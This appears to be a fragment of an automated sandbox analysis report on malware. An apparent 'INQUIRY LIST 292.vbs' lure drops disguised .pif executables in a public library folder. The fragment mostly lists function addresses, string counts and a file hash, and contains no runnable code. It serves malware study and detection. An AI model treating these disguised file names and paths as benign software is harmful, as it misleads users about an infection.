            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20181A086_2_20181A08
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20185F386_2_20185F38
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018BB906_2_2018BB90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018B3E06_2_2018B3E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018E8106_2_2018E810
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018A8506_2_2018A850
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018DC906_2_2018DC90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20189CC06_2_20189CC0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20185D186_2_20185D18
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018D1106_2_2018D110
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_201855706_2_20185570
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_201855806_2_20185580
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_201819F86_2_201819F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018AE186_2_2018AE18
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018E2506_2_2018E250
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018A2886_2_2018A288
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018D6D06_2_2018D6D0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_201896F86_2_201896F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018CB506_2_2018CB50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018BB796_2_2018BB79
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018B3D16_2_2018B3D1
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2019D2E86_2_2019D2E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2019EBF06_2_2019EBF0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_201900336_2_20190033
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_201900406_2_20190040
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D114206_2_20D11420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D121F86_2_20D121F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1F5706_2_20D1F570
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1E3886_2_20D1E388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D15FA06_2_20D15FA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D170E06_2_20D170E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1BCE86_2_20D1BCE8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D148A06_2_20D148A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D17C506_2_20D17C50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D17C606_2_20D17C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1C8686_2_20D1C868
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D154206_2_20D15420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1A0286_2_20D1A028
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D159E06_2_20D159E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1A5E86_2_20D1A5E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D18DA06_2_20D18DA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D165606_2_20D16560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1F5696_2_20D1F569
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1B1686_2_20D1B168
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1D6986_2_20D1D698
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D176A06_2_20D176A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1C2A06_2_20D1C2A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1C2A86_2_20D1C2A8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D14E606_2_20D14E60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D19A686_2_20D19A68
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D182206_2_20D18220
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1CE286_2_20D1CE28
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D187E06_2_20D187E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D15F906_2_20D15F90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1ABA86_2_20D1ABA8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1E3796_2_20D1E379
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D193606_2_20D19360
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D147186_2_20D14718
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D16B206_2_20D16B20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_20D1B7286_2_20D1B728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_210100406_2_21010040
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_210120BC6_2_210120BC
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_210107286_2_21010728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2101DD606_2_2101DD60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_21010E106_2_21010E10
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_210100336_2_21010033
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_210107246_2_21010724
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2101ABDC6_2_2101ABDC
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_21010E0D6_2_21010E0D
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_21174AD16_2_21174AD1
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_00408C6011_2_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_0040DC1111_2_0040DC11
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_00407C3F11_2_00407C3F
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_00418CCC11_2_00418CCC
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_00406CA011_2_00406CA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_004028B011_2_004028B0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_0041A4BE11_2_0041A4BE
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_00408C6011_2_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_0041824411_2_00418244
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_0040165011_2_00401650
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_00402F2011_2_00402F20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_004193C411_2_004193C4
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_0041878811_2_00418788
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_00402F8911_2_00402F89
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_00402B9011_2_00402B90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_004073A011_2_004073A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2A6B0F2011_2_2A6B0F20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2A6B0F1011_2_2A6B0F10
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2A6B15C811_2_2A6B15C8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2A6B15B811_2_2A6B15B8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2D94EBF011_2_2D94EBF0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2D94D2E811_2_2D94D2E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2D94000611_2_2D940006
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2D94004011_2_2D940040
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E421A0811_2_2E421A08
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42662611_2_2E426626
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E425F3811_2_2E425F38
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42B3E011_2_2E42B3E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42BB9011_2_2E42BB90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42EDD011_2_2E42EDD0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42E25011_2_2E42E250
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42665E11_2_2E42665E
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42AE1811_2_2E42AE18
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42D6D011_2_2E42D6D0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4296F811_2_2E4296F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42A28811_2_2E42A288
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42CB5011_2_2E42CB50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42B3D111_2_2E42B3D1
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42BB8911_2_2E42BB89
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42A85011_2_2E42A850
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42E81011_2_2E42E810
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E429CC011_2_2E429CC0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42DC9011_2_2E42DC90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42557011_2_2E425570
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42D11011_2_2E42D110
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E425D1811_2_2E425D18
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42EDC211_2_2E42EDC2
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4219F811_2_2E4219F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E42558011_2_2E425580
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CE38811_2_2E4CE388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C542011_2_2E4C5420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CF57011_2_2E4CF570
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C21F811_2_2E4C21F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C9A6811_2_2E4C9A68
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C4E6011_2_2E4C4E60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CCE2811_2_2E4CCE28
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C822011_2_2E4C8220
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CD69811_2_2E4CD698
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CC29A11_2_2E4CC29A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CC2A811_2_2E4CC2A8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C76A011_2_2E4C76A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C936011_2_2E4C9360
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CE37911_2_2E4CE379
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C471811_2_2E4C4718
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CB72811_2_2E4CB728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C6B2011_2_2E4C6B20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C87E011_2_2E4C87E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C5F9011_2_2E4C5F90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CABA811_2_2E4CABA8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C5FA011_2_2E4C5FA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C7C5011_2_2E4C7C50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CC86811_2_2E4CC868
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C7C6011_2_2E4C7C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CA02811_2_2E4CA028
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CBCD811_2_2E4CBCD8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CBCE811_2_2E4CBCE8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C70E011_2_2E4C70E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C48A011_2_2E4C48A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CB16811_2_2E4CB168
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C656011_2_2E4C6560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CF56011_2_2E4CF560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CA5E811_2_2E4CA5E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C59E011_2_2E4C59E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C8DA011_2_2E4C8DA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C0E1011_2_2E7C0E10
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CAFC811_2_2E7CAFC8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CDD6011_2_2E7CDD60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C072811_2_2E7C0728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CF79111_2_2E7CF791
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C004011_2_2E7C0040
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CF00111_2_2E7CF001
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C20B011_2_2E7C20B0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C0E0A11_2_2E7C0E0A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CABDC11_2_2E7CABDC
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C072211_2_2E7C0722
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C003211_2_2E7C0032
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E824AD111_2_2E824AD1
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_00408C6011_1_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_0040DC1111_1_0040DC11
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_00407C3F11_1_00407C3F
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_00418CCC11_1_00418CCC
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_00406CA011_1_00406CA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_004028B011_1_004028B0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_0041A4BE11_1_0041A4BE
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_00408C6011_1_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_0041824411_1_00418244
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_0040165011_1_00401650
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_00402F2011_1_00402F20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_004193C411_1_004193C4
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_0041878811_1_00418788
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_00402F8911_1_00402F89
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_00402B9011_1_00402B90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_1_004073A011_1_004073A0
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_029820C416_2_029820C4
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_00408C6017_2_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_0040DC1117_2_0040DC11
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_00407C3F17_2_00407C3F
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_00418CCC17_2_00418CCC
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_00406CA017_2_00406CA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_004028B017_2_004028B0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_0041A4BE17_2_0041A4BE
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_00408C6017_2_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_0041824417_2_00418244
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_0040165017_2_00401650
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_00402F2017_2_00402F20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_004193C417_2_004193C4
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_0041878817_2_00418788
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_00402F8917_2_00402F89
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_00402B9017_2_00402B90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_004073A017_2_004073A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1C3C15BF17_2_1C3C15BF
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1C3C15C817_2_1C3C15C8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1C3C0EE017_2_1C3C0EE0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1C3C0F2017_2_1C3C0F20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F285F3817_2_1F285F38
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28BB9017_2_1F28BB90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28B3E017_2_1F28B3E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28662717_2_1F286627
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F281A0817_2_1F281A08
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28EDD017_2_1F28EDD0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28CB5017_2_1F28CB50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28B3D117_2_1F28B3D1
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28AE1817_2_1F28AE18
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28665E17_2_1F28665E
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28E25017_2_1F28E250
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28A28817_2_1F28A288
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F2896F817_2_1F2896F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28D6D017_2_1F28D6D0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F285D1817_2_1F285D18
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28D11017_2_1F28D110
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28557D17_2_1F28557D
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28558017_2_1F285580
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F2819F817_2_1F2819F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28EDC317_2_1F28EDC3
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28E81017_2_1F28E810
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28A85017_2_1F28A850
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F28DC9017_2_1F28DC90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F289CC017_2_1F289CC0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F29EBF017_2_1F29EBF0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F29D2E817_2_1F29D2E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F29000717_2_1F290007
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1F29004017_2_1F290040
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1E38817_2_1FE1E388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE121F817_2_1FE121F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1F57017_2_1FE1F570
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1142017_2_1FE11420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE187E017_2_1FE187E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE15FA017_2_1FE15FA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1ABA817_2_1FE1ABA8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE15F9017_2_1FE15F90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1936017_2_1FE19360
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1E37917_2_1FE1E379
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE16B2017_2_1FE16B20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1B72817_2_1FE1B728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1471817_2_1FE14718
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE176A017_2_1FE176A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1C2A817_2_1FE1C2A8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1C29B17_2_1FE1C29B
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE14E6017_2_1FE14E60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE19A6817_2_1FE19A68
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1822017_2_1FE18220
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1CE2817_2_1FE1CE28
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE159E017_2_1FE159E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1A5E817_2_1FE1A5E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE18DA017_2_1FE18DA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1656017_2_1FE16560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1F56017_2_1FE1F560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1B16817_2_1FE1B168
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE170E017_2_1FE170E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1BCE817_2_1FE1BCE8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1BCDB17_2_1FE1BCDB
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE148A017_2_1FE148A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE17C6017_2_1FE17C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1C86817_2_1FE1C868
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE17C5017_2_1FE17C50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1542017_2_1FE15420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_1FE1A02817_2_1FE1A028
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_2011004017_2_20110040
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_201120B017_2_201120B0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_2011072817_2_20110728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_2011DD6017_2_2011DD60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_20110E1017_2_20110E10
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_2011003317_2_20110033
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_2011072317_2_20110723
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_2011ABDC17_2_2011ABDC
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_20110E0B17_2_20110E0B
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 17_2_20264AD117_2_20264AD1
            Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\liuuazhU.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: String function: 029846D4 appears 155 times
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: String function: 02998818 appears 50 times
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: String function: 02984860 appears 677 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027D44DC appears 74 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027E8818 appears 56 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027E889C appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027D46D4 appears 244 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027D4860 appears 943 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 027D4500 appears 34 times
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: String function: 0040FB9C appears 40 times
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: String function: 0040D606 appears 96 times
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: String function: 0040E1D8 appears 172 times
            Source: INQUIRY LIST 292.vbsInitial sample: Strings found which are bigger than 50
            Source: NETUTILS.dll.1.drStatic PE information: Number of sections : 19 > 10
